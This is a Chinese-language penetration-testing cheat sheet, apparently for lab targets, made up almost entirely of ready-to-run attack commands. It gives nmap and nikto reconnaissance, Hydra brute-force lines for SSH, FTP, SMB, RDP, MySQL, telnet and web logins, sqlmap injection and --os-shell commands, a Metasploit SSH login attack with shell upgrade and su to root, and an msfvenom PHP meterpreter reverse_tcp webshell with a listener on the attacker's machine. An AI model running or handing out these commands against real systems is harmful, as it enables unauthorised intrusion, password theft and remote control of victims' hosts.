网站目录扫描:
御剑工具进行扫描:
7kbscan工具进行网站目录扫描:
探测靶场IP
使用netdiscover -r ip/netmask
先输入ifconfig
查询当前ip和子网掩码
当我输入netdiscover -r 192.168.1.117/24
速度可能有点慢,需要等待一会儿
挖掘开放服务信息
nmap -sV ip
挖掘靶场全部信息
nmap -A -v 靶场IP地址
挖掘靶场的操作系统类型与版本
nmap -O 靶场IP地址
挖掘靶场全部信息 A全部 v格式化输出 T线程
nmap -A -v -T4 ip
探测所有开放的端口
nmap -p- -T4 ip
探测端口隐藏文件
dirb http://ip:port/
用nikto扫描器挖掘敏感信息
nikto -host 靶场IP地址:端口
Hydra密码爆破工具
windows上编译好的下载地址:地址
kali系统自带这个工具;
1>爆破SSH
hydra -l 用户名 -P 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh
2>爆破FTP
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3>爆破SMB
hydra -l administrator -P pass.txt 192.168.0.2 smb
4>爆破rdp
hydra ip rdp -l administrator -P pass.txt -V
5>爆破POP3
hydra -l muts -P pass.txt my.pop3.mail pop3
6>爆破http-proxy
hydra -l admin -P pass.txt http-proxy://192.168.0.2
7>爆破web表单
hydra -l 用户名 -P 密码字典 -s 80 域名 http-post-form"/admin/login.php:username=^USER^&password=^PASS^:<密码错误的时候的报错>"
8>mysql破解
hydra -l root –P pass.txt –e ns 127.0.0.1 mysql
相关命令:
get类的sql注入命令:
sqlmap -u url -dbs 查看数据库名 //url:cat.php?id=1
sqlmap -u url -D "" --tables 查看对应数据库中的数据表
sqlmap -u url -D "" -T "" --columns 查看对应字段
sqlmap -u url -D "" -T "" -C "" --dump 查看字段的值 //y y
// sqlmap -u url --os-shell 可以尝试直接获取shell
post类的失去了注入命令:
sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D "数据库名" -tables 查看对应数据库中的数据表 --batch
sqlmap -r request.raw --level 5 --risk 3 -D "数据库名" -T “表名”-columns 查看对应字段 --batch
sqlmap -r request.raw --level 5 --risk 3 -D "数据库名" -T “表名”-C "列名" --dump --batch
X-Forwarded-For注入漏洞:
sqlmap -u url --headers="X-Forwarded-For:*" --dbs --batch
sqlmap -u url --headers="X-Forwarded-For:*" -D “数据库名” --tables 查看对应数据库中的数据表 --batch
sqlmap -u url --headers="X-Forwarded-For:*" -D “数据库名” -T “表名”--columns 查看对应字段 --batch
sqlmap -u url --headers="X-Forwarded-For:*" -D “数据库名” -T “表名”-C “列名”--dump --batch
9、telnet 破解
hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
sql注入攻击工具使用
利用cupp创建字典
git clone https://github.com/jeanphorn/common-password
chmod +x cupp.py
./cupp.py -i 以交互的方式创建字典
字典生成脚本, 用python语言写成的可交互性的字典生成脚本。尤其适合社会工程学,当你收集到目标的具体信息后,你就可以通过这个脚本来智能化生成关于目标的字典。
使用metasploit破解SSH
msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhosts 攻击IP
set username hadi
set pass_file hadi.txt
set threads 6
set verbose true
show options
run
之后可以:
sessions -i 1 开启shell
python -c "import pty;pty.spawn('/bin/bash')" 拿到一个交互性好的shell
su - root 提权
开放smb服务的情况(139,445)
列出文件,查出敏感文件
smbclient -L ip
访问文件
smbclient '\\ip\文件夹名''
通过get 文件来下载文件
制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip lport=攻击机监听端口 -f raw
攻击机监听:
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 攻击机ip
set lport 攻击机监听端口
run
查找漏洞
searchsploit 版本号
对大端口非http服务 使用nc来探测端口的banner信息
nc ip port
web漏洞扫描器owasp-zap
专注于web安全的漏洞扫描器avws
wpscan的web扫描工具
扫描某登陆界面的用户名